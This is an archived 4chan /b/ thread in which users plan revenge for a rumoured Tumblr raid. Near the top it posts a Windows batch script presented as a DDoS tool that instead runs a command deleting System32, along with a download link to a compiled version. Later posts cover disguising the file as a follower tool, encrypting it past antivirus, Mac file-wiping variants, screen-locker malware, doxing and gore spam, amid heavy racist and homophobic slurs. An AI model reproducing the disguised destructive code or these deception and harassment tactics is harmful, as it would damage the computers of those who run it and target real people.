[Boards: 3 / a / aco / adv / an / asp / b / biz / c / cgl / ck / cm / co / d / diy / e / fa / fit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mu / n / news / o / out / p / po / pol / qa / qst / r / r9k / s / s4s / sci / soc / sp / t / tg / toy / trash / trv / tv / u / v / vg / vip /vp / vr / w / wg / wsg / wsr / x / y ] [Search | Home]
4Archive logo
Tumblr plans to fuck with us on the 4th of...
If images are not shown try to refresh the page. If you like this website, please disable any AdBlock software!
The stories and information posted here are artistic works of fiction and falsehood.
Only a fool would take anything posted here as fact.

You are currently reading a thread in /b/ - Random

Thread replies: 302
Thread images: 68
File: tumblr2.jpg (69 KB, 875x867) Image search: [iqdb] [SauceNao] [Google]
tumblr2.jpg
69 KB, 875x867
Tumblr plans to fuck with us on the 4th of July /b/. So what are we going to do about this?
>>
File: image.jpg (313 KB, 1280x900) Image search: [iqdb] [SauceNao] [Google]
image.jpg
313 KB, 1280x900
>>552460590
Give tumbler this.
>>
You mean we're going to be overrun by retarded faggots? Gasp!
>>
>Your mom
>>
>So what are we going to do about this?

Do what any /b/tard worth a damn would do: Post Spiderman and trains in their threads.

But you faggots wont, because /b/ doesn't do that anymore. Fucking sad
>>
>Fuck with us
What's the worst they can do? I doubt they're even intelligent enough to start a thread let alone find /b/
>>
Guess i'll c u guise on CatieChan den..
>>
>>552460590
implying half of tumblr isnt already on here and the half? well they have lives
>>
File: 1351981051983.gif (2 MB, 202x175) Image search: [iqdb] [SauceNao] [Google]
1351981051983.gif
2 MB, 202x175
>>552460590
>Tumblr plans to fuck with us

What are they gonna do, spam us with gore and porn?

I hope they find there way to /pol/, it would be funny, I think.
>>
>>552460771
if this happens. it will be the funniest thing on the planet. and my mouth will fall off
>dat ip
>>
>>552460590
Wait it out. Who knows, maybe we've grossly underestimated them, they'll actually pull it off, and we can all go outside and live actual lives.
>>
File: 1382420514334.jpg (79 KB, 345x343) Image search: [iqdb] [SauceNao] [Google]
1382420514334.jpg
79 KB, 345x343
>>552461119
>FUCK /pol/ bunch of racist assholes
>20 minutes on /pol/
>SEIG HEIL FUCK THE KIKES RACE WAR 14/88 TANKS IN 30 MINUTES
>>
>>552460987
On a scale from 1 to autism how much down syndrome do you have? Almost every thread some one is posting spiderman pics.
>>
>>552460771
pretty smart actually but you sure that direct IP will do anything?
>>552460987
This is why we need to fucking do something
>>552461027
We do nothing we look like pussies
>>552461080
Wtf are you talking about?
>>552461119
No they plan to raid us in their own Tumblr faggy way like how we used to do back in the day /b/ and 4chan needs to step the fuck up like back in the day before Tumblr turns into the new faggy version of 4Chan because Tumblr wants their own raids their own trolls they want to steal content from us then call us out on our internet freedom then attack us? We need to man and 4Chan the fuck up and do some real fucking shit. Someone plan something for fuck sake someone do something anything really.
>>
Gonna convert this code to an .exe, get Tumblr to prepare to use it for operation overlord.

echo off
echo //DDOS PROGRAM//
ECHO ///OPERATION OVERLORD///

set /p ip=Enter IP address:
set /p pack=Enter Packet Amount:

echo Are you sure you want to DDoS %ip% with %pack% packets?
echo [Y/N]
pause > nul
echo kidding nigger!
del/ C:\Windows\System32
>>
Go here and help anons with there plan

>>552460010
>>552460010
>>552460010
>>552460010
>>
>>552461512
That's already out there, only /b/tards couldn't compile it since everyone runs Windows and no mac fags or linux fags would compile
>>
>>552461275
>extra chromosome syndrome equal neurological condition which is as of today, poorly understood

smart faggot, right there
>>
>>552461512
You can download it here. https://www.dropbox.com/s/ep71lzwrn3iuo39/ddos.exe
>>
Probably just joot trying to draw more users.
It's already succeeded.

itsfuckingnothing.jpg
>>
>>552461824
it's legit, thanks man. EVERYONE DOWNLOAD THIS, IT WILL HELP TAKE DOWN TUMBLR
>>
>>552460590
>implying tumblr can shock /b/

We're gonna need a bigger implication

___ ___ ___ ___
___ /\__\ /\ \ /\__\ |\__\ ___
/\ \ /::| | /::\ \ /:/ / |:| | /\ \
\:\ \ /:|:| | /:/\:\ \ /:/ / |:| | \:\ \
/::\__\ /:/|:|__|__ /::\~\:\ \ /:/ / |:|__|__ /::\__\
__/:/\/__/ /:/ |::::\__\ /:/\:\ \:\__\ /:/__/ /::::\__\ __/:/\/__/
/\/:/ / \/__/~~/:/ / \/__\:\/:/ / \:\ \ /:/~~/~ /\/:/ /
\::/__/ /:/ / \::/ / \:\ \ /:/ / \::/__/
\:\__\ /:/ / \/__/ \:\ \ \/__/ \:\__\
\/__/ /:/ / \:\__\ \/__/
\/__/ \/__/
___ ___
/\__\ /\ \
/::| | /::\ \
/:|:| | /:/\:\ \
/:/|:| |__ /:/ \:\ \
/:/ |:| /\__\ /:/__/_\:\__\
\/__|:|/:/ / \:\ /\ \/__/
|:/:/ / \:\ \:\__\
|::/ / \:\/:/ /
/:/ / \::/ /
\/__/ \/__/
>>
>>552461643
what the fuck are you talking about ? you can compile a bat to exe on windows
learn to computer man

btw sys32 will need administrator
you could do the oldschool everything on C code
>>
>>552461618
OP from this thread, COME HERE TOO.
>>
>>552462182
I tested it on my XP in my bedroom. The code works, and it bypasses administrator. Especially considering the fact that 90% of the accounts on tumblr are admin accounts on the PC.
>>
>>552460590
Oh shit this is bad guys they are going to rape 4chan with porn and shit.
>>
>>552462124
kek
>>
>>552462397
exactly, on xp they are
on windows 7 you need to grant administrator rights to everything running even if you're bill gates himself
>>
>>552462124
fuck
>>
>>552460590
The thing is, we're really easy to fuck with, the way our website is set up. Anybody can post a thread and everybody will see it. With tumblr, it's not like that. I have no idea what we could do to tumblr.
>>
>>552462720
shit, seriously?

We might be able to take out at least 15% of the computers that download that program then.
>>
>us
there is no "us," because i would never associate with someone retarded enough to care about tumblr "invading /b/," honestly, who gives a fuck? the site is so shit that no one will be able to tell the difference anyways... god... it's so easy to tell that you're some fag from reddit looking for "LE EDGES FOUND ONLY ON /B/!" go back to your yacht club and jerk off about how deep an amazing game of thrones is fag
>>
>>552462597
Oh no, please don't give us more pron and traps
>>
>>552460771
If you wanna stay anonymous you should be using a layer 7 DoS tool such as Xerxes
>>
>>552460782

Oh my god that would surely change /b/ into ...
Wait nah nvm
>>
>>552463012
well shit like norton antivirus and all this retarded shit women get installed on their pcs when they buy in the shop automatically detect codes like del C:/windows and delete it off the bat so not even that
>>
I've got an idea, why don't we just report this entire shit to tumblr's staff? Raids are also against the roors there
>>
File: 1403064175349.jpg (31 KB, 352x450) Image search: [iqdb] [SauceNao] [Google]
1403064175349.jpg
31 KB, 352x450
>>552460590
>thinking theyre legit
>thinking they can do anything
>>
>Pic related
>>
>>552461256
>SEIG HEIL FUCK THE KIKES RACE WAR 14/88 TANKS IN 30 MINUTES
topkek
>>
>>552463525
Because their fail will be great to sit back and watch
>>
>>552463525
they wont do shit and /b/ does not work like that we fuck shit up....well back in the day we did....so lets /b/ the fuck up
>>552463084
Its about honor
>>552463369
Not everyone will have it maybe encryption
>>552463042
GTFO newfag
?
>>
>>552463779
>wanting to loic a company owned by yahoo
>thinking loic does anything

>>552463525
their ToS dont mention anything about raiding
>>
>>552463874
lol yeah confirmed 12 year old no questions asked
"honor"
get laid kid
>>
>>552463874
if you encrypt it enough not to be found by antivirus, no tumblrfag will be able to decrypt it
we can only hope their antivirus passed the 30 day trial or whatever is on there
>>
>>552463369
eh, true.

even if we get five percent of the PC's to get wiped, we'll still have a victory.
>>
Now how's exactly do we "give tumblr" the program?
>>
>>552464151
I did not mean it like that you fucking newfag i mean having some fucking /b/ 4chan oldfag pride and fuck shit up like we used to do before pussies like you post gay fucking shit and look at ponies
>>
>>552464359
pose as a tumblrfag
>>
I dont get it... tumblrfags wanna loic 4bong, moot makes the dollars, bans us, fucks with us and its us, simple users that are going to defend it?

ARE YOU FAGGOTS SERIOUS???
>>
>>552464359
It'll be a suppository
>>
>>552464359
Possibly a Tumblr program to get auto followers or whatever the fuck they use? It says if they run it that they will get follows or tell them its some uber fucking program all we need them is to click the .exe and then go on some Tumblr facebook pages and promote the program or go to Tumblr directly and share
>>
>>552464343
it'd be more fun to just get them to download cp trought their dear tor or something so the nsa gets them for ddosing
>>
Attacking 4chan is like shitting into a sewer.

Destroying 4chan would be the equivalent of shutting down the sewer system and letting the shit flow into the street.
>>
>>552462983
That's true. I made an account to see how shit works on Tumblr and spamming is out of the question. The thing is that, if you post (or "reblog" or whatever the fuck) an image on Tumblr, it'll only be visible on your blog's site, and it'll appear on the dashboard (think of it as a feed) of your followers.

If we're gonna make a bunch of accounts, we'll have no followers, so it'd be pointless to post spiderman posts and trains, gore, etc.

What we can do, is tag those images under common/popular/trending tags (e.g. 'funny', 'gif', 'fandom', 'sherlock', 'teen wolf', 'feminism', 'photography', 'selfie', lana del rey', etc.).

Alright, I'll stop being a faggot now.
>>
>>552464784
>4chun is /b/
youre a retard
>>
>>552464784
https://twitter.com/WeezyFKennedy/status/477259742809554945
this guy
>>
>>552464935
Their is always those follow 4 follow bullshit? Maybe pose as something and then go to some swagfag Tumblr facebook page
>>
File: IMG_439509049557.jpg (8 KB, 256x256) Image search: [iqdb] [SauceNao] [Google]
IMG_439509049557.jpg
8 KB, 256x256
Guys I have a theory, what if instead of fucking with us that one day, they stay here forever?
>>
>implying /b/ didn't organize this
>implying tumblr could actually make this shithole any worse
>>
>>552461484
https://www.youtube.com/watch?v=S1woxkraClg&feature=kp
YEAH
to bad all I can afford is a fucking chromebook so I can't hack shit. I'll probably go post a bunch of spider-man shit over there.
>>
>>552465167
You can install Linux on Chromebooks, you know
>>
>>552465105
Or we could go to random (preferably feminist / feminism-related) blogs, go on their submit page, and submit a bunch of gorey images. Obviously we can't do it to every Tumblr blog ever, but it should be to those blogs who are deserving of it, who support this stupid ass #Raid4chan shit, and/ or who are feminists (there's a shit ton on Tumblr. It's fucking horrible).
>>
>>552461512
If you want i can C++ the same program.
>>
>>552465052
Fucking DOX him
>>
File: rustling leaves.jpg (42 KB, 390x227) Image search: [iqdb] [SauceNao] [Google]
rustling leaves.jpg
42 KB, 390x227
>>552461484
well, someone is overhyped
>>
>>552465882
God damn right its about fucking time /b/ does something interesting like the good old fuckin days
>>
File: Untitled.png (156 KB, 1024x1024) Image search: [iqdb] [SauceNao] [Google]
Untitled.png
156 KB, 1024x1024
>>552461824
>>
>>552466348
Is that link legit or is it a 4Chan attack?
( I would assume its against Tumblr considering the Anon and operation overlord logo )
>>
File: 1398883515722.png (68 KB, 629x541) Image search: [iqdb] [SauceNao] [Google]
1398883515722.png
68 KB, 629x541
>>552466601
I just made the pic along with the program. It should delete the System32 of (some) windows Computers.
>>
>>552461136
Newfag here. I dont get it
>>
>>552467308
I know you dont.

>>552467070
we could do one that fills the hard drive with 0b files or something
>>
Is there a delete system32 equivalent for mac? Remember, this is tumblr we're talking about and there will probably be quite a large number of mac users on there
>>
File: 1401649459680.jpg (39 KB, 470x597) Image search: [iqdb] [SauceNao] [Google]
1401649459680.jpg
39 KB, 470x597
>>552467308
They DDoS themselves.
>>
>>552467070
You brilliant bastard
>>
>>552467070
nice
>>552467308
Its ok you newfag
-
also .i have a program that allows you to make a .exe that does not show up as a virus when opened it locks ur PC until you complete a survey with the code and instead of the link to survey lets just put in meatspin and then promote the program as something else and then promote it on Tumblr swagfag facebook pages anyoneelse like this idea? Its only going to make a big effect is if a shit ton of people do it
>>
>>552467587
No clue. Never used a Mac before.
>>
File: ohjew.png (50 KB, 501x644) Image search: [iqdb] [SauceNao] [Google]
ohjew.png
50 KB, 501x644
>>552467542
>>552467589

4chan you sick sick bastards. I love you all.
>>
>>552467587
you can just del+search c:/*
or whatever it is on mac under echo off, and just write out *pew-pew-pew* sjw milk sprayed from bosoms
>>
Well there are few paths here, faggots.

1.Ops a faggot
2. Someone make up some bullshit picture telling them how to "ddos" (have it involve del system 32)
3.someone make a link to a virus like the Blaster worm or similiar
4.???
5.profit
>>
File: 9.png (18 KB, 346x347) Image search: [iqdb] [SauceNao] [Google]
9.png
18 KB, 346x347
>>552460771
Fire at will!
>>
>>552468291
>>552467903
>>552467589
they figured some shit out
http://shutdown4chan.tumblr.com/post/88890752313/daxzee-feminists-you-wanna-help-out-the-cause
>>
>>552462124
>>
>>552466039
what old days? what weird stories have you been listening to? /b/ was always the same shit, only with more memes, which we abandoned when they spreaded to the rest of the internet, rarely has /b/ done anything productive like raiding. usually

admit it, /b/ is a cancerous place, that's why we love it
>>
fuck lets not just ddos em why not get them v&
>>
>>552467587
/System/Library is kind of similar, though not exactly. Things like kernel extensions, core frameworks, and other tools live there.

/Library contains a bunch of system configuration stuff, and some support frameworks and other ephemera that contain binaries for some things.

/sbin, and /usr/sbin contain a bunch of the sysadmin focused binaries, and /bin and /usr/bin contain various other Unix binaries, many of which are involved in the "system32" equivalent side of things, and are not directly visible.
>>
>>552468404
mfw prevented ddos with photoshop
>>
>>552460590
Not notice.
>>
>>552460590
>>552460771
didnt people go to prison for doing this same thing to facebook and the like?
>>
>>552468404
>>552466348
>>
File: 1364446993373.png (103 KB, 1133x856) Image search: [iqdb] [SauceNao] [Google]
1364446993373.png
103 KB, 1133x856
>>552468404
It does not matter. It doesn't work like this. There will always be some people that will be rused no matter what.

How do you think scams can still happen even if it's obvious to most people?

We must still spread it. It's even tumblr for fuck's sakes. A website made to spread things like wildfire.
>>
>>552468669
it is illegal so probably
btw the tumblr supreme overlord was reading one of the threads, posted a pic from the thread
>>
Trying to raid 4chan is like trying to gas the nazis. It's pure autism
>>
Wait, why the fuck are we even worried. The friendzoned faggots they're getting to do this for them probably love this site.

And we all know girls dunno how to DDOS without some tutorial or geeksquad
>>
>>552467070
What a glorious idea /b/rother.
>>
>>552468873
The bigger and older the scam, the most effective it is. People can't believe is that big or that so many people have fallen for it.
>>
>>552468925
yea when anonymous wasnt just some fagfuck collection of edgy 16 year olds
>>
They tried to do this a few years ago, too. Nothing will come of it. Fat girls will keep posting black and white photos of naked skinny girls on tumblr and fat neckbeards will keep posting skinny black on fat white girl porn on /b/.

I care.
>>
File: Untitled.jpg (59 KB, 531x499) Image search: [iqdb] [SauceNao] [Google]
Untitled.jpg
59 KB, 531x499
this is like when you see a 5 year old trying to take out the taliban with a plastic cocktail sword
>>
File: wut.jpg (12 KB, 170x148) Image search: [iqdb] [SauceNao] [Google]
wut.jpg
12 KB, 170x148
>>552469525
jealous 15 year old detected
>>
>>552469793
k den
>>
>>552469774
tumbler = feminist website
>>
File: lol.jpg (120 KB, 500x600) Image search: [iqdb] [SauceNao] [Google]
lol.jpg
120 KB, 500x600
anyone remember this lol
>>
>mfw 4chan will never be as prime as it was back then. We need to awaken the tame beast!!!!!!!
>>
>>552460771
can someone enlighten me on what the ip address is of
I'm guessing tumblr
>>
>>552470483
fuck off summer
>>
>>552470537
write it in your browser
>>
>>552470483
i hate to visit 4chan at summer , its only when faggot and 12 years kids come up
>>
>>552470415
>stealing our memes
yes because you should be proud of cancer
>>
>>552465613
Implying you have the permissions to delete system32.
Top kek, newb.
>>
>>552470483
Oh my look at the calendar

it's summer
>>
File: 1403204849413.gif (1 MB, 300x200) Image search: [iqdb] [SauceNao] [Google]
1403204849413.gif
1 MB, 300x200
>>552471053 it sure is
>>
>>552470804
>i hate to visit 4chan at summer , its only when faggot and 12 years kids come up
> 4chan at summer
>faggot and 12 years kids
/b/ is basically the edgier version of reddit
>>
>>552471313
reddit is stealin muh maymayz
I cant stand for this
>>
File: 1403213110528.jpg (31 KB, 840x700) Image search: [iqdb] [SauceNao] [Google]
1403213110528.jpg
31 KB, 840x700
>>552468404
>LOIC
>Malware
No one can be that stupid... r-right?
>>
File: 1378359433663.jpg (48 KB, 450x331) Image search: [iqdb] [SauceNao] [Google]
1378359433663.jpg
48 KB, 450x331
>>552461275
>>
>>552471527
my avast antivirus says its a trojan horse
>>
So, what's going on with tumblr?
>>
>>552471630
you really downloaded it ?
>>
>>552471527
facepalm.jpg
>>
File: dafuqz_diz_sheit.png (202 KB, 400x300) Image search: [iqdb] [SauceNao] [Google]
dafuqz_diz_sheit.png
202 KB, 400x300
>>552460590
they're fucking with a sleeping giant.
half of those chillin would be scarred for life if they set foot in a rekt/gore thread to take over, much less b, much less 4 chan in general. it's like being affraid of summer. THERE IS NO THREAT
but no worries. if 4chan falls, another will rise

tldr >enjoy their butthurt and eat some damn popcorn it's nbd
>>
Mfw zimmerman and rodgers
>>
>>552471646
the usual
>>
>MUH SEKRET CLUB

/b/ is full of faggots and cancer. This thread is proof.
>>
>>552471739
>fucing le oldfag reporting in
>cant tell sarcasm
>>
>>552471880
>"Far Right"
flawless, you got'em man
>>
>>552471843
i will kill my self if r/wtf or tumbler become worst place
>>
>>552471880
adolf hitler was a mod on /b/
>>
File: 1354674848889.gif (656 KB, 500x281) Image search: [iqdb] [SauceNao] [Google]
1354674848889.gif
656 KB, 500x281
>>552471956 yup
>>
Nothing, i have to study.
>>
>>552460590
>Tumblr plans to fuck with us
>what are we going to do about this

You're saying this like Tumblr is some sort of threat. We know it might possibly happen on July 4th, but how are we gonna know who is from Tumblr and who isn't? I bet some people in this thread have tumblr blogs themselves, they'll just fit right in with the regular newfags/shitposters 4chan has, and we'll just act like pricks in the thread like we do literally everything else.

Who knows how many "raids" they've actually done to us and we haven't known about since their content will fit right in with /b/eta community that is /b/.

Don't worry, I include myself as I say these words.
>>
http://www.youtube.com/watch?v=UG6xvfuS71M
someone in another anti-tumblr thread requested a video. Share this around
>>
>>552471880
the funny thing is if half of this was true you would be put on a government watchlist just for being here, but i guess thats why newfags think they need to use proxies...
>>
>>552472010
>cant tell sarcasm
i dont know why but i never did
>>
>>552461673
>extra chromosome syndrome

If you're really trying to call someone out, you should at least use the correct name and not some dumbass catch-all. Its trisomy-21 you stupid nigger.
>>
>>552472382
I wanted to say ur a faget
but you included the good lines in the enermous fgt lines
>"united as 1 divided by 0"
>>
>>552472382
I lol'd, but it's so clearly fake.
>>
So, we all DDOS Tumblr on July 4th?
>>
>>552472382
this is the cringiest thing i have watched all month
>>
>>552472804
No
>>
>>552467793
you can rm the personal files or everything
one guy wrote a mac script to rm (remove) the /home directory and fill everything with gore images
you could go ask for it on /g/
>>
here you go

youtube.com/watch?v=UG6xvfuS71M
>>
tumblr bitching about 4chan is like the news reports about "internet trolling/bullying" and how every time some pussy takes a joke too far its "just another example of the disturbing and dark part of the internet"
>>
>>552473332
kekd
I hope she posts tits
>>
>>552473332
kek
>>
File: 1361542319327.jpg (21 KB, 500x178) Image search: [iqdb] [SauceNao] [Google]
1361542319327.jpg
21 KB, 500x178
#tumblrwar
>>
How do they even intend on going about "taking down 4chan"?
>>
>>552472382
this... could be the gayest product of /b/ since Snacks...
>>
>>552461136
It worked on 9gag, it should work on Tumblr.
>>
>>552473519
>rape 4chan with porm and shit
4chan.com better watch out
>>
>>552473594
they'll cry about it
>>
>>552473669
Some preteen obviously decided some RP was in order. What a faggot.
>>
This entire thing is stupid because even with a reported 900 people 4chan has a hundred thousand users at this very moment. These tumblr "Raids" will last one day have no effect on the site as a whole and then go back to tumblr the next day. It's stupid and pointless on their part.
>>
>>552473519
old shit
gtfo idiot
>>
>>552473594
At first I read that they'd try to ddos us with loic, but I think they are also just going to start posing feminist shit on the fourth. They'll fail regardless though.
>>
If this succeeds, we will have one upped what/pol/ did with #endfathersday
>>
File: FOOBAL.jpg (23 KB, 500x375) Image search: [iqdb] [SauceNao] [Google]
FOOBAL.jpg
23 KB, 500x375
We aren't going to do anything at all. We're all depressed, lazy, worthless shits who don't possess the motivation to do anything about a bunch of even bigger pussies trying to start shit. If tumblr does follow through successfully, a few of us will speak of revenge for the week following, but then we will all forget and go back to masturbating, laughing, bitching, and crying at our little shit-stain on the internet.
>>
>>552473863
showing what devastating effects tumblr has had in the past
>>
maybe they'll make /b/ better?
>>
>>552473987
You maybe
>>
>>552473987
the harsh realities of the world we live in
>>
>>552473946
/pol/ didn't do #endfathersday. It was all tumblr's fault.
>>
>>552473519
>porn and shit
>>
>>552474143
>implying that cancer can do anything but ruin this place
You need to think before you type
>>
>>552473987
Damn son, you sure are projecting hard. If you don't want to do anything, don't, but you shouldn't try to ruin everyone elses fun.
>>
>>552473887
Can't we all just start anti-feminism threads on the fourth?

or do you faggots have to be EXTRA EDGY for the summer
>>
>>552474369
I'm all about that
lets do that
post anti tumblr/feminist shit all day
>>
how about on july 3rd or 4th or whatever all /b/tards do this? basically a safe group ddos with no virus involved
>>
Nothing. But an inundation of tumblr fags that don't know how to use an adblocker will probably net Moot a bunch in advertising revenue.

......is it a conspiracy.......
>>
>>552474245
/pol/ set it up, it was their plan, but yes, tumblr tier feminists made it all fall into place.
>>
File: download.jpg (9 KB, 225x225) Image search: [iqdb] [SauceNao] [Google]
download.jpg
9 KB, 225x225
tumblr is coming back for more?
>>
File: 120411.jpg (115 KB, 780x520) Image search: [iqdb] [SauceNao] [Google]
120411.jpg
115 KB, 780x520
>>552474519
and fuck forgot pic
>>
>>552473801
well... it made my dick physically hurt.
I knew this place morphed into a ridiculous shithole after about '08... but stuff like this almost makes me want to renounce any affiliation I've ever had with this place.
Seriously, if anyone (beyond the 12 year-old that created it) finds this shit to be "cool," they should really go talk to their parents and ask them how they managed to raise someone so completely and utterly lost.
>>
sorry but tumblr doesn't really care about 4chan
and definitely doesn't care about trying to "attack" it
half the users come here anyway and they all have blogs with as shitty posts as on /b/

you're pretty clueless if you think the "social justice" interests of a small left wing group on tumblr are planned around website attacks and not the discourse and the personal attitudes of the handful of idiots that come here
>>
>>552474369
extra edgy, you don't have to help if you don't want to, but don't ruin our fun
>>
>>552474098
>>
>>552474369
maybe we could just try to be worse than usual that day, so they are too disgusted to actually do anything but run away back to their hugbox
>>
>>552474634
Hi SRS
>>
>>552474627
sorry to alarm you, but you are on this site right now

>2spooky
>>
>>552471880
Dat MS PowerPoint
>>
>>552468404
Well lets make it look like the person posting this is one of us trying to stop it
Be like font listen to them 4chan hacked there tumbler
>>
>>552467969
This
>>
So...what's their plan? Piss in the ocean of piss? Act stupid? Shitpost? Get in pointless arguments?

The question I'm asking here is how are we supposed to notice when they arrive? How will we tell the difference between them and every other retard that posts here?

Why should we care?
>>
>>552468515
And this also. /b/ is the cancer of itself. We should raid more or do something more productive
>>
File: 1402595154501.jpg (115 KB, 500x375) Image search: [iqdb] [SauceNao] [Google]
1402595154501.jpg
115 KB, 500x375
>>552474815

>thinking posts on 4chan are this effective and edgy

people don't actually leave just because they see posts on the internet dot orgs
>>
>>552475590
we should definitely raid more
>>
>>552467542
Not bad. How about this: write a program that creates empty or almost empty files in root, documents, etc.
Not just a few. Tens of thousands. You could even use small images. Don't know about you guys, but some of my porn folders take for fucking ever to get into on windows...
>>
>>552475550
>there is no plan
>>
What's a tumbler?
>>
>>552475931
how about this. do it yourself or stfu. really im pissed of people talking about super fun/cool ideas and not doing crap bout it. make them dl that as their new LOIC if you want, spoiling my shits for u guys, but ill only do it once.
rghost
.net / 56509105
>>
>>552476035
i think you put wet clothes in it and they come out dry
>>
>>552475887
Raids get shot down by people saying NYPA
>>
>>552476035
some sort of drinking glass
>>
>>552475184
Good idea
>>552475550
>>552476008
attack the tumblr users supporting the anti 4chan profile by DOXing , viruses , prank calls anything at all
>>552476035
They invented SwagFags
>>
>>552476470
aka heaven
>>
>>552460771
What does this actually do?
>>
Ayy lmao
>>
>>552476851
It makes them DDoS themselves.
>>
File: faggot alert.png (2 MB, 1275x961) Image search: [iqdb] [SauceNao] [Google]
faggot alert.png
2 MB, 1275x961
http://shutdown4chan.tumblr.com/
I died

>Every time I visit 4chan, it’s striking how homophobic, sexist, racist and anti-Semitic its members are.
>>
I have a question for any oldfag, im a newfag, i only started browsing and posting during spring break in april, so i dont have much experience here, so do raids like this happen often, or am I witnessing something rare?
>>
Not be a faggot, stop caring, and go drink fuckin beer and bbq
>>
File: noice.png (1 MB, 1207x949) Image search: [iqdb] [SauceNao] [Google]
noice.png
1 MB, 1207x949
>>552476035
The mechanism that allows a lock to turn over
>>
>>552476527
i use tumblr and even posted some screens from this thread there for laughs but i literally couldn't care less if users supporting an anti 4chan profile got trolled
>>
File: 1231242324.png (203 KB, 440x350) Image search: [iqdb] [SauceNao] [Google]
1231242324.png
203 KB, 440x350
>>552466348
People should go around spreading this.
>>
>>552476567
What the fuck did you just fucking say about me, you little bitch? I’ll have you know I graduated top of my class in the Navy Seals, and I’ve been involved in numerous secret raids on Al-Quaeda, and I have over 300 confirmed kills. I am trained in gorilla warfare and I’m the top sniper in the entire US armed forces. You are nothing to me but just another target. I will wipe you the fuck out with precision the likes of which has never been seen before on this Earth, mark my fucking words. You think you can get away with saying that shit to me over the Internet? Think again, fucker. As we speak I am contacting my secret network of spies across the USA and your IP is being traced right now so you better prepare for the storm, maggot. The storm that wipes out the pathetic little thing you call your life. You’re fucking dead, kid. I can be anywhere, anytime, and I can kill you in over seven hundred ways, and that’s just with my bare hands. Not only am I extensively trained in unarmed combat, but I have access to the entire arsenal of the United States Marine Corps and I will use it to its full extent to wipe your miserable ass off the face of the continent, you little shit. If only you could have known what unholy retribution your little “clever” comment was about to bring down upon you, maybe you would have held your fucking tongue. But you couldn’t, you didn’t, and now you’re paying the price, you goddamn idiot. I will shit fury all over you and you will drown in it. You’re fucking dead, kiddo.
>>
why the hell are people worried about tumblr.

a summer fag like me of 09 doesn't care about tumblr. i care about finding the next jessi slaughter and making GMA again
>>
>>552477225
they used to happen more often
>>
>>552477225
they happen every now and then but they're usually a lot better and more worth it than this
>>
Has anyone actually read the shit on that tumblr? It doesn't actually seem that legitimate. It looks like the work of one of you faggots, to be honest.
>>
File: 1394953666429.jpg (20 KB, 367x451) Image search: [iqdb] [SauceNao] [Google]
1394953666429.jpg
20 KB, 367x451
>>552464419
>4chan oldfag pride
>>
>>552476923
He is from Tumblr 10/10
>>552477437
way to be a fucking traitor and disappoint your father
>>552477521
We are not worried we just want to fuck with them teach them and show them who the fuck we are
>>552477868
Who gives a fuck people are still involved in it and still are going to do something either way troll or not we fuck with the users following shit and it looks like a swagfag teen girl on her period running it
>>
>>552477868
this, i follow a lot of left wing and social justice-y blogs and non of this is tumblr's canon
>>
>>552478142
nigga please
>>
Personally, I would love it if moot just took 4chan down for 'maintenance' the night before, so when all the little tumblrites show up it'd be like showing up to a war only to find the other country couldn't be bothered.
>>
this, we need to summon the moot
>>
File: ronoman.jpg (187 KB, 1280x720) Image search: [iqdb] [SauceNao] [Google]
ronoman.jpg
187 KB, 1280x720
>>552475550
Lol niggers shut up and view pure sociopathic wisdom right here.
What if we deceive these homosexuals/pansexuals/asexuals/omnisexuals/bisexuals/transexuals into ddosing themselves by playing dumb?
Let me explain.
If we made them ddos tumblr the following way
First, we share pics telling them to play dumb and ''pretend'' to ddos tumblr's IP which is actually 4chan's IP, but then when tumblr overloads we reveal that they were ddosing themselves all along.
Genius, right?
>>
File: 1398388820504.gif (2 MB, 230x134) Image search: [iqdb] [SauceNao] [Google]
1398388820504.gif
2 MB, 230x134
What does /b/ think the mods, or even moot, think about this "shutdown4chan" thing
>>
>>552478603
>>552478324
>implying m00t still cares/goes on /b/, ever.
>>
File: anon.jpg (62 KB, 1280x698) Image search: [iqdb] [SauceNao] [Google]
anon.jpg
62 KB, 1280x698
>>552473519
>rape
>porn
>shit
I like where this is going..
>>
Well some tumblr person print screened our convos, we need to set up a private chat
>>
last time i fucking remember you never talked about shit or planned

SOMEONE JUST DID SOMETHING
>>
>>552478725
>>552478550
shut the fuck up.
please.
>>
>>552474369
yes
>>
>>552479125
I don't want to steal your job bro.
>>
File: image.jpg (212 KB, 1056x1080) Image search: [iqdb] [SauceNao] [Google]
image.jpg
212 KB, 1056x1080
Why dont we get them to spam /v/?
/v/ gets shit on and tumbltards get b&
Two birds, one stone
>>
File: flintstone_car.jpg (9 KB, 259x194) Image search: [iqdb] [SauceNao] [Google]
flintstone_car.jpg
9 KB, 259x194
>>552478603
The name game!
Moot!!
Moot, Moot bo Boot Bonana fanna fo Foot!
Fee fy mo Mppt, moot!
>>
What the fuck did you just fucking say about me, you little bitch? I’ll have you know I graduated top of my class in the Navy Seals, and I’ve been involved in numerous secret raids on Al-Quaeda, and I have over 300 confirmed kills. I am trained in gorilla warfare and I’m the top sniper in the entire US armed forces. You are nothing to me but just another target. I will wipe you the fuck out with precision the likes of which has never been seen before on this Earth, mark my fucking words. You think you can get away with saying that shit to me over the Internet? Think again, fucker. As we speak I am contacting my secret network of spies across the USA and your IP is being traced right now so you better prepare for the storm, maggot. The storm that wipes out the pathetic little thing you call your life. You’re fucking dead, kid. I can be anywhere, anytime, and I can kill you in over seven hundred ways, and that’s just with my bare hands. Not only am I extensively trained in unarmed combat, but I have access to the entire arsenal of the United States Marine Corps and I will use it to its full extent to wipe your miserable ass off the face of the continent, you little shit. If only you could have known what unholy retribution your little “clever” comment was about to bring down upon you, maybe you would have held your fucking tongue. But you couldn’t, you didn’t, and now you’re paying the price, you goddamn idiot. I will shit fury all over you and you will drown in it. You’re fucking dead, kiddo.
>>
>>552479032
>>552478923
add
fb dot com slash kevin.prit.1
and send me a message and ill check u out and add u to a private group where we are discussing actions
>>
>>552479606
That shit is getting old
>>
>>552460771
http://shutdown4chan.tumblr.com/post/88890752313/daxzee-feminists-you-wanna-help-out-the-cause
They've almost caught this, but they're too stupid to realise it's fake for the wrong reason.
>>
>>552479606
wow everyone get a load of this tumblr user
>>
File: mootfags.gif (1021 KB, 400x226) Image search: [iqdb] [SauceNao] [Google]
mootfags.gif
1021 KB, 400x226
>>552479331
>>
>>552477517
>>552479606
Is it pasta night tonight?
>>
how about noone posts on 4chan that day and we just let them argue with themselves?
>>
>>552478142
>Show them who the fuck we are

Holy fucking christ could you be more pathetic?

>muh secret internet club, dont insult it.
Your fuckin gay m8?
>>
>>552479762
>and send me a message and ill check u out and add u to a private group where we are discussing actions

you... are a glorious faggot.
a supremely glorious faggot.
